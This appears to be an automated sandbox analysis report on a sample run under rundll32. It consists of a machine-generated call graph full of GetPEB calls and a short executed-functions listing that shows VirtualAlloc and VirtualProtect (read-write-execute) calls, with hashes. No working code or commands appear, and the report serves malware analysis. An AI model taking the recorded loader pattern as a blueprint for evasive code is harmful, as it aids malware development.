1fcbab 3585->3612 3589 1eb356 3588->3589 3590 1e68ec GetPEB 3589->3590 3591 1eb3dd 3590->3591 3591->3546 3593 1f1bbc 3592->3593 3616 1e96ca 3593->3616 3601 1f5f44 3600->3601 3602 1e68ec GetPEB 3601->3602 3603 1f5ff8 3602->3603 3603->3546 3605 1fb082 3604->3605 3606 1f36c4 GetPEB 3605->3606 3607 1fb0a4 3606->3607 3607->3546 3609 1fb66c 3608->3609 3610 1e68ec GetPEB 3609->3610 3611 1fb6ed 3610->3611 3611->3546 3613 1fcbcc 3612->3613 3614 1e68ec GetPEB 3613->3614 3615 1ed5ae 3614->3615 3615->3546 3617 1e68ec GetPEB 3616->3617 3618 1e9769 3617->3618 3619 1ed4fe 3618->3619 3620 1e96ca GetPEB 3619->3620 3621 1ed536 3620->3621 3622 1f8f9b 3621->3622 3623 1f8fd7 3622->3623 3623->3623 3624 1f1d04 3623->3624 3626 1eeadd 3623->3626 3624->3546 3627 1eeaf3 3626->3627 3630 1fafaf 3627->3630 3631 1fafc2 3630->3631 3632 1e68ec GetPEB 3631->3632 3633 1eeb4c 3632->3633 3633->3623 3635 1e302c 3634->3635 3636 1e68ec GetPEB 3635->3636 3637 1e30c0 3636->3637 3637->3440 3639 1f9e49 3638->3639 3659 1e0cb5 3639->3659 3643 1e85d5 3642->3643 3644 1e68ec GetPEB 3643->3644 3645 1e8667 3644->3645 3645->3450 3647 1e510e 3646->3647 3648 1e534a 3647->3648 3663 1f1f7b 3647->3663 3648->3450 3652 1e58e8 GetPEB 3653 1e5305 3652->3653 3653->3648 3653->3652 3657 1f0fd0 3654->3657 3655 1f1102 3655->3450 3656 1ee5c0 GetPEB 3656->3657 3657->3655 3657->3656 3675 1f453a 3657->3675 3660 1e0ccf 3659->3660 3661 1e68ec GetPEB 3660->3661 3662 1e0d69 3661->3662 3662->3450 3664 1f1f9c 3663->3664 3665 1e68ec GetPEB 3664->3665 3666 1e52e6 3665->3666 3666->3648 3667 1e58e8 3666->3667 3668 1e5901 3667->3668 3671 1fd6e1 3668->3671 3672 1fd6fe 3671->3672 3673 1e68ec GetPEB 3672->3673 3674 1e5983 3673->3674 3674->3653 3676 1f4553 3675->3676 3677 1e68ec GetPEB 3676->3677 3678 1f45d6 3677->3678 3678->3657 3680 1e68ec GetPEB 3679->3680 3681 1ef787 3680->3681 3681->3469 3684 1f08e9 3682->3684 3683 1f0b5a 3686 1e37f6 GetPEB 3683->3686 3684->3683 3685 1f0b58 3684->3685 3687 1e4a6f GetPEB 3684->3687 3703 1e37f6 3684->3703 3685->3469 3686->3685 3687->3684 3690 1f18b2 3689->3690 3691 1e68ec GetPEB 3690->3691 3692 1f1928 3691->3692 3692->3469 3694 1e3a17 3693->3694 3695 1e68ec GetPEB 3694->3695 3696 1e3ad0 3695->3696 3696->3469 3698 1e4d77 3697->3698 3699 1e4f7f 3698->3699 3700 1e4a6f GetPEB 3698->3700 3701 1e4f65 3698->3701 3699->3469 3700->3698 3707 1eb046 3701->3707 3704 1e381b 3703->3704 3705 1e68ec GetPEB 3704->3705 3706 1e38a6 3705->3706 3706->3684 3708 1eb060 3707->3708 3709 1e58e8 GetPEB 3708->3709 3710 1eb0fb 3709->3710 3710->3699 3718 1f895f 3711->3718 3714 1f8e18 3714->3495 3715 1e4cc9 GetPEB 3715->3718 3716 1e5370 GetPEB 3716->3718 3718->3714 3718->3715 3718->3716 3719 1f02e1 GetPEB 3718->3719 3736 1efada 3718->3736 3740 1fb0ac 3718->3740 3744 1f45e3 3718->3744 3719->3718 3721 1e68ec GetPEB 3720->3721 3722 1ee8d4 3721->3722 3722->3495 3748 1f0f0d 3723->3748 3733 1e28cb 3728->3733 3729 1ee81f GetPEB 3729->3733 3730 1e2b4a 3732 1ee761 GetPEB 3730->3732 3734 1e2b48 3732->3734 3733->3729 3733->3730 3733->3734 3755 1e2dc4 3733->3755 3759 1f1dec 3733->3759 3734->3495 3737 1efb1b 3736->3737 3738 1e68ec GetPEB 3737->3738 3739 1efbc5 3738->3739 3739->3718 3741 1fb0ca 3740->3741 3742 1e68ec GetPEB 3741->3742 3743 1fb155 3742->3743 3743->3718 3745 1f45f3 3744->3745 3746 1e68ec GetPEB 3745->3746 3747 1f4693 3746->3747 3747->3718 3749 1e68ec GetPEB 3748->3749 3750 1f0fb3 3749->3750 3751 1f600e 3750->3751 3752 1f6027 3751->3752 3753 1e68ec GetPEB 3752->3753 3754 1f1444 3753->3754 3754->3495 3756 1e2df4 3755->3756 3757 1e68ec GetPEB 3756->3757 3758 1e2e94 3757->3758 3758->3733 3760 1f1e09 3759->3760 3761 1e68ec GetPEB 3760->3761 3762 1f1ea4 3761->3762 3762->3733 4319 1e9d95 4323 1ea07d 4319->4323 4320 1ed54c GetPEB 4320->4323 4321 1e4a6f GetPEB 4321->4323 4323->4320 4323->4321 4324 1f2982 GetPEB 4323->4324 4325 1ea24d 4323->4325 4326 1e502c GetPEB 4323->4326 4327 1e3c8e GetPEB 4323->4327 4328 1f14fc 4323->4328 4324->4323 4326->4323 4327->4323 4333 1f163c 4328->4333 4329 1ef965 GetPEB 4329->4333 4330 1ed54c GetPEB 4330->4333 4331 1f189f GetPEB 4331->4333 4332 1f170e 4332->4323 4333->4329 4333->4330 4333->4331 4333->4332 3763 1f4012 3764 1f402f 3763->3764 3765 1e4a6f GetPEB 3764->3765 3766 1f4148 3765->3766 3767 1f418d 3766->3767 3771 1e5d63 3766->3771 3770 1ed3f5 GetPEB 3770->3767 3780 1e5d84 3771->3780 3772 1ebf62 GetPEB 3772->3780 3774 1e6716 3776 1ed3f5 GetPEB 3774->3776 3778 1e670f 3776->3778 3777 1e4a6f GetPEB 3777->3780 3778->3767 3778->3770 3780->3772 3780->3774 3780->3777 3780->3778 3785 1f2032 3780->3785 3789 1e9038 3780->3789 3792 1e5c8a 3780->3792 3796 1f280b 3780->3796 3800 1f11d8 3780->3800 3804 1f883c 3780->3804 3808 1e8c61 3780->3808 3786 1f2052 3785->3786 3787 1e68ec GetPEB 3786->3787 3788 1f20c8 3787->3788 3788->3780 3790 1e68ec GetPEB 3789->3790 3791 1e90c5 3790->3791 3791->3780 3793 1e5cb6 3792->3793 3794 1e68ec GetPEB 3793->3794 3795 1e5d50 3794->3795 3795->3780 3797 1f2838 3796->3797 3798 1e68ec GetPEB 3797->3798 3799 1f28b5 3798->3799 3799->3780 3801 1f11eb 3800->3801 3802 1e68ec GetPEB 3801->3802 3803 1f1293 3802->3803 3803->3780 3805 1f885b 3804->3805 3806 1e68ec GetPEB 3805->3806 3807 1f88fe 3806->3807 3807->3780 3809 1e8c91 3808->3809 3810 1e68ec GetPEB 3809->3810 3811 1e8d2e 3810->3811 3811->3780 4338 1ef793 4340 1ef857 4338->4340 4341 1e27ec GetPEB 4338->4341 4341->4340 3372 1ff090 3373 1ff0b5 3372->3373 3378 1fe620 3373->3378 3375 1ff1bf 3381 1feb40 VirtualProtect 3375->3381 3377 1ff1f8 3379 1fe661 3378->3379 3380 1fe694 VirtualAlloc 3379->3380 3380->3375 3382 1feb95 3381->3382 3383 1fede6 3382->3383 3384 1fedb8 VirtualProtect 3382->3384 3383->3377 3384->3382 4342 1e498c 4343 1e49aa 4342->4343 4344 1e4a6f GetPEB 4343->4344 4345 1e4a3c 4344->4345 4346 1ed3f5 GetPEB 4345->4346 4347 1e4a64 4345->4347 4346->4347 4348 1edb86 4353 1ede20 4348->4353 4349 1e96ca GetPEB 4349->4353 4350 1edf2e 4351 1f8f9b GetPEB 4351->4353 4352 1ed4fe GetPEB 4352->4353 4353->4349 4353->4350 4353->4351 4353->4352 3812 1fb706 3813 1fb80b 3812->3813 3819 1fb85e 3813->3819 3820 1f41ab 3813->3820 3817 1fb83b 3818 1f02e1 GetPEB 3817->3818 3818->3819 3825 1f41c4 3820->3825 3822 1f4411 3840 1fc4a5 3822->3840 3824 1f440f 3832 1f9eda 3824->3832 3825->3822 3825->3824 3836 1f17e1 3825->3836 3831 1f02e1 GetPEB 3831->3824 3833 1f9efa 3832->3833 3834 1e4a6f GetPEB 3833->3834 3835 1f9f94 3834->3835 3835->3817 3835->3835 3837 1f17fa 3836->3837 3838 1e68ec GetPEB 3837->3838 3839 1f1891 3838->3839 3839->3825 3841 1fc4bb 3840->3841 3842 1e4a6f GetPEB 3841->3842 3843 1f4427 3842->3843 3844 1e9c3d 3843->3844 3853 1ebea5 3844->3853 3846 1e9d8a 3849 1f8e80 3846->3849 3850 1f8e9f 3849->3850 3851 1f36c4 GetPEB 3850->3851 3852 1f4452 3851->3852 3852->3831 3854 1ebec4 3853->3854 3855 1e68ec GetPEB 3854->3855 3856 1e9d3a 3855->3856 3856->3846 3857 1fd623 3856->3857 3858 1fd64a 3857->3858 3859 1e68ec GetPEB 3858->3859 3860 1fd6cb 3859->3860 3860->3846 3861 1e4304 3868 1e476b 3861->3868 3863 1e4964 3864 1e5370 GetPEB 3864->3868 3865 1e9a4b GetPEB 3865->3868 3866 1e4966 3869 1ee761 GetPEB 3866->3869 3867 1fb63c GetPEB 3867->3868 3868->3863 3868->3864 3868->3865 3868->3866 3868->3867 3870 1f02e1 GetPEB 3868->3870 3872 1f373e 3868->3872 3876 1f3805 3868->3876 3869->3863 3870->3868 3873 1f375e 3872->3873 3874 1e68ec GetPEB 3873->3874 3875 1f37f3 3874->3875 3875->3868 3877 1f3818 3876->3877 3878 1e68ec GetPEB 3877->3878 3879 1f38b6 3878->3879 3879->3868 4354 1e38be 4355 1fbba5 GetPEB 4354->4355 4356 1e394c 4355->4356 4357 1f34bf 4359 1f35ca 4357->4359 4358 1fa6d9 GetPEB 4358->4359 4359->4358 4360 1f36a7 4359->4360 4361 1f36a9 4359->4361 4362 1e598b GetPEB 4359->4362 4364 1e4a6f GetPEB 4359->4364 4363 1ed3f5 GetPEB 4361->4363 4362->4359 4363->4360 4364->4359 4365 1f90be 4366 1f0f0d GetPEB 4365->4366 4368 1f9275 4366->4368 4367 1f9319 4368->4367 4369 1e4a6f GetPEB 4368->4369 4370 1f92f8 4369->4370 4370->4367 4371 1ef965 GetPEB 4370->4371 4371->4367 4372 1e3db8 4373 1f0f0d GetPEB 4372->4373 4382 1e4196 4373->4382 4374 1e42d3 4376 1fc15b GetPEB 4374->4376 4375 1e42d1 4376->4375 4377 1e5370 GetPEB 4377->4382 4378 1e96ca GetPEB 4378->4382 4379 1e9a4b GetPEB 4379->4382 4380 1fb060 GetPEB 4380->4382 4381 1f02e1 GetPEB 4381->4382 4382->4374 4382->4375 4382->4377 4382->4378 4382->4379 4382->4380 4382->4381 4383 1ed5b8 4390 1ed85a 4383->4390 4385 1ed9e5 4387 1f11d8 GetPEB 4385->4387 4386 1ed3f5 GetPEB 4386->4390 4389 1ed9e3 4387->4389 4390->4385 4390->4386 4390->4389 4392 1f0339 GetPEB 4390->4392 4393 1f0604 4390->4393 4400 1f1719 4390->4400 4404 1e6a1b 4390->4404 4392->4390 4394 1f061d 4393->4394 4395 1e91b4 GetPEB 4394->4395 4396 1e4a6f GetPEB 4394->4396 4397 1f0829 4394->4397 4398 1f084e 4394->4398 4395->4394 4396->4394 4408 1e91b4 4397->4408 4398->4390 4401 1f1735 4400->4401 4402 1e68ec GetPEB 4401->4402 4403 1f17cf 4402->4403 4403->4390 4405 1e6a34 4404->4405 4406 1e68ec GetPEB 4405->4406 4407 1e6ad6 4406->4407 4407->4390 4409 1e91e2 4408->4409 4410 1e68ec GetPEB 4409->4410 4411 1e928a 4410->4411 4411->4398 4412 1eb6b9 4414 1eb85f 4412->4414 4413 1eb8cd 4414->4413 4415 1ed3f5 GetPEB 4414->4415 4416 1fbba5 GetPEB 4414->4416 4417 1f9e33 GetPEB 4414->4417 4418 1ee761 GetPEB 4414->4418 4415->4414 4416->4414 4417->4414 4418->4414 3880 1f0437 3881 1f044e 3880->3881 3881->3881 3882 1f0536 3881->3882 3883 1e4a6f GetPEB 3881->3883 3883->3881 3884 1f9333 3886 1f949b 3884->3886 3885 1eb340 GetPEB 3885->3886 3886->3885 3888 1f9569 3886->3888 3890 1f0241 3886->3890 3893 1e9a99 3886->3893 3901 1e2353 3890->3901 3894 1e9ab9 3893->3894 3920 1f28cc 3894->3920 3899 1ee761 GetPEB 3900 1e9c32 3899->3900 3900->3886 3905 1e2374 3901->3905 3904 1e2684 3906 1ee761 GetPEB 3904->3906 3905->3904 3907 1e2682 3905->3907 3909 1f1eb2 3905->3909 3913 1f20dc 3905->3913 3916 1f0b97 3905->3916 3906->3907 3907->3886 3910 1f1ecb 3909->3910 3911 1e68ec GetPEB 3910->3911 3912 1f1f6c 3911->3912 3912->3905 3914 1e68ec GetPEB 3913->3914 3915 1f216b 3914->3915 3915->3905 3917 1f0bb0 3916->3917 3918 1e68ec GetPEB 3917->3918 3919 1f0c47 3918->3919 3919->3905 3921 1e68ec GetPEB 3920->3921 3922 1e9bfe 3921->3922 3922->3900 3923 1f1111 3922->3923 3924 1f112c 3923->3924 3925 1e68ec GetPEB 3924->3925 3926 1e9c1e 3925->3926 3926->3899 3927 1f7132 3928 1f7195 3927->3928 3930 1e7405 GetPEB 3928->3930 3932 1f7f7f 3928->3932 3935 1f7f99 3928->3935 3936 1e4a6f GetPEB 3928->3936 3939 1e5370 GetPEB 3928->3939 3942 1f02e1 GetPEB 3928->3942 3944 1ed3f5 GetPEB 3928->3944 3946 1f1933 3928->3946 3950 1e95e8 3928->3950 3954 1fb869 3928->3954 3957 1f7065 3928->3957 3961 1e92a3 3928->3961 3970 1e6737 3928->3970 3974 1ee272 3928->3974 3981 1f3c35 3928->3981 3985 1eedc7 3928->3985 3930->3928 3989 1e7405 3932->3989 3936->3928 3939->3928 3942->3928 3944->3928 3947 1f195c 3946->3947 3948 1e68ec GetPEB 3947->3948 3949 1f19ed 3948->3949 3949->3928 3951 1e9607 3950->3951 3952 1e68ec GetPEB 3951->3952 3953 1e96a5 3952->3953 3953->3928 3993 1e3aeb 3954->3993 3958 1f7093 3957->3958 3959 1e68ec GetPEB 3958->3959 3960 1f7119 3959->3960 3960->3928 3963 1e94b4 3961->3963 3964 1e95b5 3963->3964 3967 1e4a6f GetPEB 3963->3967 3968 1e58e8 GetPEB 3963->3968 3969 1ed3f5 GetPEB 3963->3969 3997 1f2a4e 3963->3997 3965 1e95cc 3964->3965 3966 1ed3f5 GetPEB 3964->3966 3965->3928 3966->3965 3967->3963 3968->3963 3969->3963 3971 1e6754 3970->3971 3972 1e68ec GetPEB 3971->3972 3973 1e6807 3972->3973 3973->3928 3976 1ee28f 3974->3976 3975 1ee4bd 3978 1ee67c GetPEB 3975->3978 3976->3975 3977 1ee4bb 3976->3977 3979 1e4a6f GetPEB 3976->3979 4001 1ee67c 3976->4001 3977->3928 3978->3977 3979->3976 3982 1f3c5f 3981->3982 3983 1e68ec GetPEB 3982->3983 3984 1f3d14 3983->3984 3984->3928 3986 1eede9 3985->3986 3987 1e68ec GetPEB 3986->3987 3988 1eee75 3987->3988 3988->3928 3990 1e7418 3989->3990 3991 1e68ec GetPEB 3990->3991 3992 1e74b4 3991->3992 3992->3935 3994 1e3b14 3993->3994 3995 1e68ec GetPEB 3994->3995 3996 1e3ba6 3995->3996 3996->3928 3998 1f2a6d 3997->3998 3999 1e68ec GetPEB 3998->3999 4000 1f2ae7 3999->4000 4000->3963 4002 1ee6a8 4001->4002 4003 1e68ec GetPEB 4002->4003 4004 1ee747 4003->4004 4004->3976 4005 1eef2e 4010 1eef53 4005->4010 4008 1e4a6f GetPEB 4008->4010 4009 1ef44c 4010->4008 4010->4009 4011 1ef439 4010->4011 4015 1e58e8 GetPEB 4010->4015 4016 1e4b2a 4010->4016 4020 1f0558 4010->4020 4023 1e3bbc 4010->4023 4027 1e6818 4010->4027 4011->4009 4014 1ed3f5 GetPEB 4011->4014 4014->4009 4015->4010 4017 1e4b53 4016->4017 4018 1e68ec GetPEB 4017->4018 4019 1e4bf3 4018->4019 4019->4010 4021 1e68ec GetPEB 4020->4021 4022 1f05f8 4021->4022 4022->4010 4024 1e3be2 4023->4024 4025 1e68ec GetPEB 4024->4025 4026 1e3c76 4025->4026 4026->4010 4028 1e6838 4027->4028 4029 1e68ec GetPEB 4028->4029 4030 1e68da 4029->4030 4030->4010 4031 1ef52e 4032 1eb340 GetPEB 4031->4032 4033 1ef69d 4032->4033 4040 1e74bf 4033->4040 4036 1ef6ed 4041 1e74d8 4040->4041 4042 1e68ec GetPEB 4041->4042 4043 1e7564 4042->4043 4043->4036 4044 1e2b70 4043->4044 4045 1e2b90 4044->4045 4046 1e5370 GetPEB 4045->4046 4047 1e2cde 4046->4047 4048 1e9a4b GetPEB 4047->4048 4049 1e2cfc 4048->4049 4050 1f02e1 GetPEB 4049->4050 4051 1e2d0e 4050->4051 4052 1ee092 4051->4052 4053 1ee0a5 4052->4053 4054 1e68ec GetPEB 4053->4054 4055 1ee130 4054->4055 4055->4036 4419 1e70ad 4424 1e70d5 4419->4424 4420 1e73d6 4421 1eb046 GetPEB 4420->4421 4422 1e73d4 4421->4422 4423 1e4a6f GetPEB 4423->4424 4424->4420 4424->4422 4424->4423 4425 1ed4fe GetPEB 4424->4425 4425->4424 4426 1f7fa7 4427 1e96ca GetPEB 4426->4427 4428 1f811d 4427->4428 4429 1e96ca GetPEB 4428->4429 4430 1f812a 4429->4430 4431 1e96ca GetPEB 4430->4431 4432 1f8141 4431->4432 4435 1efdef 4432->4435 4436 1efe2b 4435->4436 4437 1eff22 4436->4437 4438 1eeadd GetPEB 4436->4438 4438->4436 4060 1e3523 4062 1e363f 4060->4062 4064 1e3677 4062->4064 4065 1eaf66 4062->4065 4069 1f1d13 4062->4069 4066 1eaf7c 4065->4066 4067 1e68ec GetPEB 4066->4067 4068 1eb00b 4067->4068 4068->4062 4070 1f1d29 4069->4070 4071 1e68ec GetPEB 4070->4071 4072 1f1de0 4071->4072 4072->4062 4439 1fc5a1 4440 1fc913 4439->4440 4441 1e598b GetPEB 4440->4441 4442 1e3c8e GetPEB 4440->4442 4443 1fca48 4440->4443 4444 1e5370 GetPEB 4440->4444 4445 1fca55 GetPEB 4440->4445 4446 1e8e39 GetPEB 4440->4446 4447 1f02e1 GetPEB 4440->4447 4441->4440 4442->4440 4444->4440 4445->4440 4446->4440 4447->4440 4451 1ee8dd 4452 1ee9c8 4451->4452 4453 1fc4a5 GetPEB 4452->4453 4458 1eea0a 4452->4458 4454 1ee9e0 4453->4454 4459 1e2eac 4454->4459 4457 1f02e1 GetPEB 4457->4458 4461 1e2ec9 4459->4461 4460 1e2fdf 4460->4457 4461->4460 4463 1f1a0b 4461->4463 4464 1f1a27 4463->4464 4465 1e68ec GetPEB 4464->4465 4466 1f1ab6 4465->4466 4466->4461 4467 1eb8d8 4468 1ebcfd 4467->4468 4470 1ebe61 4468->4470 4472 1ebe5f 4468->4472 4477 1e5370 GetPEB 4468->4477 4479 1fc15b GetPEB 4468->4479 4480 1e9a4b GetPEB 4468->4480 4481 1f02e1 GetPEB 4468->4481 4482 1f38c2 4468->4482 4491 1eea16 4468->4491 4495 1e6ae5 4468->4495 4498 1e30e8 4468->4498 4473 1eb340 GetPEB 4470->4473 4476 1ebe79 4473->4476 4507 1f46f7 4476->4507 4477->4468 4479->4468 4480->4468 4481->4468 4489 1f3af1 4482->4489 4483 1ef895 GetPEB 4483->4489 4484 1f3c12 4485 1e502c GetPEB 4484->4485 4486 1f3c10 4485->4486 4486->4468 4487 1e502c GetPEB 4487->4489 4488 1f2982 GetPEB 4488->4489 4489->4483 4489->4484 4489->4486 4489->4487 4489->4488 4511 1ef481 4489->4511 4492 1eea33 4491->4492 4493 1e68ec GetPEB 4492->4493 4494 1eeace 4493->4494 4494->4468 4496 1e68ec GetPEB 4495->4496 4497 1e6b85 4496->4497 4497->4468 4502 1e33e2 4498->4502 4499 1e5370 GetPEB 4499->4502 4502->4499 4503 1e3412 4502->4503 4504 1f02e1 GetPEB 4502->4504 4506 1e3423 4502->4506 4515 1f144e 4502->4515 4519 1efff8 4502->4519 4505 1f6643 GetPEB 4503->4505 4504->4502 4505->4506 4506->4468 4508 1f470a 4507->4508 4509 1e68ec GetPEB 4508->4509 4510 1f479f 4509->4510 4510->4472 4512 1ef491 4511->4512 4513 1e68ec GetPEB 4512->4513 4514 1ef522 4513->4514 4514->4489 4516 1f1464 4515->4516 4517 1e68ec GetPEB 4516->4517 4518 1f14ee 4517->4518 4518->4502 4520 1f0032 4519->4520 4521 1e68ec GetPEB 4520->4521 4522 1f00e3 4521->4522 4522->4502 4073 1e3953 4074 1e39cb 4073->4074 4077 1efa3b 4074->4077 4078 1e68ec GetPEB 4077->4078 4079 1e39db 4078->4079 4080 1ec851 4087 1ecb2e 4080->4087 4082 1ecc39 4083 1ecc3b 4104 1f3d29 4083->4104 4084 1ed54c GetPEB 4084->4087 4086 1e5370 GetPEB 4086->4087 4087->4082 4087->4083 4087->4084 4087->4086 4088 1e9a4b GetPEB 4087->4088 4089 1f02e1 GetPEB 4087->4089 4090 1fc15b 4087->4090 4088->4087 4089->4087 4091 1fc178 4090->4091 4092 1e4cc9 GetPEB 4091->4092 4093 1fc401 4092->4093 4094 1e4cc9 GetPEB 4093->4094 4095 1fc41b 4094->4095 4096 1e4cc9 GetPEB 4095->4096 4097 1fc430 4096->4097 4114 1ef965 4097->4114 4100 1ef965 GetPEB 4101 1fc467 4100->4101 4118 1edac8 4101->4118 4105 1f3d46 4104->4105 4106 1e5370 GetPEB 4105->4106 4107 1f3ef5 4106->4107 4122 1ee231 4107->4122 4110 1f02e1 GetPEB 4111 1f3f25 4110->4111 4112 1ee092 GetPEB 4111->4112 4113 1f3f3a 4112->4113 4113->4082 4115 1ef97e 4114->4115 4116 1e68ec GetPEB 4115->4116 4117 1efa2c 4116->4117 4117->4100 4119 1edadb 4118->4119 4120 1e68ec GetPEB 4119->4120 4121 1edb7b 4120->4121 4121->4087 4123 1ee250 4122->4123 4124 1f36c4 GetPEB 4123->4124 4125 1ee26a 4124->4125 4125->4110 4126 1fbc4d 4127 1fbc65 4126->4127 4128 1e2353 GetPEB 4127->4128 4129 1e4a6f GetPEB 4127->4129 4131 1fc125 4127->4131 4132 1f189f GetPEB 4127->4132 4133 1ef965 GetPEB 4127->4133 4135 1ed3f5 GetPEB 4127->4135 4136 1fc127 4127->4136 4137 1e6ca5 4127->4137 4128->4127 4129->4127 4132->4127 4133->4127 4134 1ed3f5 GetPEB 4134->4136 4135->4127 4136->4131 4136->4134 4141 1e6ccb 4137->4141 4138 1e6fc7 4140 1faebe GetPEB 4138->4140 4139 1e6fc5 4139->4127 4140->4139 4141->4138 4141->4139 4142 1e4a6f GetPEB 4141->4142 4144 1faebe 4141->4144 4142->4141 4145 1faef8 4144->4145 4146 1e68ec GetPEB 4145->4146 4147 1faf95 4146->4147 4147->4141 4152 1e9846 4158 1e99a8 4152->4158 4153 1e4a6f GetPEB 4153->4158 4154 1e99bc 4157 1e85b2 GetPEB 4154->4157 4156 1e99dc 4157->4156 4158->4153 4158->4154 4158->4156 4159 1e9772 4158->4159 4160 1e978d 4159->4160 4161 1e68ec GetPEB 4160->4161 4162 1e9838 4161->4162 4162->4158 4166 1fe740 4167 1fe620 VirtualAlloc 4166->4167 4168 1fe74d 4167->4168 4527 1f00fe 4528 1e5370 GetPEB 4527->4528 4529 1f0211 4528->4529 4534 1f3f43 4529->4534 4532 1f02e1 GetPEB 4533 1f0238 4532->4533 4535 1f3f53 4534->4535 4536 1e68ec GetPEB 4535->4536 4537 1f021f 4536->4537 4537->4532 4169 1e0d7a 4180 1e14c8 4169->4180 4170 1e3c8e GetPEB 4170->4180 4172 1e1699 4176 1e502c GetPEB 4172->4176 4174 1e16b5 4175 1e5370 GetPEB 4175->4180 4176->4174 4180->4170 4180->4172 4180->4174 4180->4175 4182 1f02e1 GetPEB 4180->4182 4183 1f2982 4180->4183 4187 1ec017 4180->4187 4200 1fca55 4180->4200 4207 1e8e39 4180->4207 4211 1e502c 4180->4211 4215 1e6b9a 4180->4215 4182->4180 4184 1f2997 4183->4184 4185 1e68ec GetPEB 4184->4185 4186 1f2a3f 4185->4186 4186->4180 4188 1ec046 4187->4188 4190 1e4a6f GetPEB 4188->4190 4191 1ec6fd 4188->4191 4196 1ed3f5 GetPEB 4188->4196 4197 1ec70f 4188->4197 4198 1e502c GetPEB 4188->4198 4199 1e96ca GetPEB 4188->4199 4219 1efd1a 4188->4219 4223 1ef895 4188->4223 4227 1eda03 4188->4227 4231 1ee13c 4188->4231 4190->4188 4195 1ed3f5 GetPEB 4191->4195 4195->4197 4196->4188 4197->4180 4198->4188 4199->4188 4201 1e96ca GetPEB 4200->4201 4202 1fcb39 4201->4202 4203 1ed4fe GetPEB 4202->4203 4204 1fcb81 4203->4204 4205 1f8f9b GetPEB 4204->4205 4206 1fcb9c 4205->4206 4206->4180 4208 1e8e67 4207->4208 4209 1f36c4 GetPEB 4208->4209 4210 1e8e8a 4209->4210 4210->4180 4212 1e5042 4211->4212 4213 1e68ec GetPEB 4212->4213 4214 1e50e5 4213->4214 4214->4180 4216 1e6bdf 4215->4216 4217 1e68ec GetPEB 4216->4217 4218 1e6c7e 4217->4218 4218->4180 4220 1efd46 4219->4220 4221 1e68ec GetPEB 4220->4221 4222 1efdd9 4221->4222 4222->4188 4224 1ef8b1 4223->4224 4225 1e68ec GetPEB 4224->4225 4226 1ef955 4225->4226 4226->4188 4228 1eda1f 4227->4228 4229 1e68ec GetPEB 4228->4229 4230 1edab7 4229->4230 4230->4188 4232 1ee182 4231->4232 4233 1e68ec GetPEB 4232->4233 4234 1ee212 4233->4234 4234->4188 4538 1f66fb 4553 1f6cc7 4538->4553 4539 1eeadd GetPEB 4539->4553 4540 1e58e8 GetPEB 4540->4553 4541 1f6ee6 4542 1fc4a5 GetPEB 4541->4542 4543 1f6eff 4542->4543 4559 1edf4a 4543->4559 4544 1e96ca GetPEB 4544->4553 4546 1e4a6f GetPEB 4546->4553 4548 1f6ed9 4549 1ee4f3 GetPEB 4549->4553 4550 1f02e1 GetPEB 4550->4548 4551 1fc4a5 GetPEB 4551->4553 4553->4539 4553->4540 4553->4541 4553->4544 4553->4546 4553->4548 4553->4549 4553->4551 4554 1f02e1 GetPEB 4553->4554 4555 1ec801 4553->4555 4554->4553 4556 1ec829 4555->4556 4557 1f36c4 GetPEB 4556->4557 4558 1ec849 4557->4558 4558->4553 4560 1edf66 4559->4560 4561 1f36c4 GetPEB 4560->4561 4562 1edf82 4561->4562 4562->4550 4235 1e5478 4236 1e5777 4235->4236 4238 1ed54c GetPEB 4236->4238 4239 1f3805 GetPEB 4236->4239 4240 1e58db 4236->4240 4241 1ee761 GetPEB 4236->4241 4242 1fb63c GetPEB 4236->4242 4243 1f6fa5 4236->4243 4238->4236 4239->4236 4241->4236 4242->4236 4244 1f6fc5 4243->4244 4245 1e68ec GetPEB 4244->4245 4246 1f7053 4245->4246 4246->4236 4247 1f2179 4251 1f242a 4247->4251 4248 1eb340 GetPEB 4248->4251 4249 1f24e6 4250 1e5370 GetPEB 4250->4251 4251->4248 4251->4249 4251->4250 4252 1e9a4b GetPEB 4251->4252 4253 1f02e1 GetPEB 4251->4253 4252->4251 4253->4251 4563 1e27f3 4564 1e2809 4563->4564 4565 1e68ec GetPEB 4564->4565 4566 1e289c 4565->4566 4272 1e8f63 4273 1e902d 4272->4273 4274 1e9006 4272->4274 4278 1f9665 4274->4278 4277 1efa3b GetPEB 4277->4273 4290 1f9bf5 4278->4290 4279 1e3c8e GetPEB 4279->4290 4280 1ed54c GetPEB 4280->4290 4281 1e4cc9 GetPEB 4281->4290 4283 1f9df7 4286 1e598b GetPEB 4283->4286 4284 1e74bf GetPEB 4284->4290 4285 1e5370 GetPEB 4285->4290 4287 1e9019 4286->4287 4287->4273 4287->4277 4288 1f02e1 GetPEB 4288->4290 4289 1e9a4b GetPEB 4289->4290 4290->4279 4290->4280 4290->4281 4290->4283 4290->4284 4290->4285 4290->4287 4290->4288 4290->4289 4291 1f0339 4290->4291 4292 1e68ec GetPEB 4291->4292 4293 1f03d6 4292->4293 4293->4290

                                                                      Executed Functions

                                                                      Function 001FEB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001FEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001FEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1e0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 97a10145540773341ebc5178c26d946eefb5364c4a7d306cd2560212974939de
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: B2C189B5A00209DFCB48CF98C590EAEB7B6BF88314F148159E919AB355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001FE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
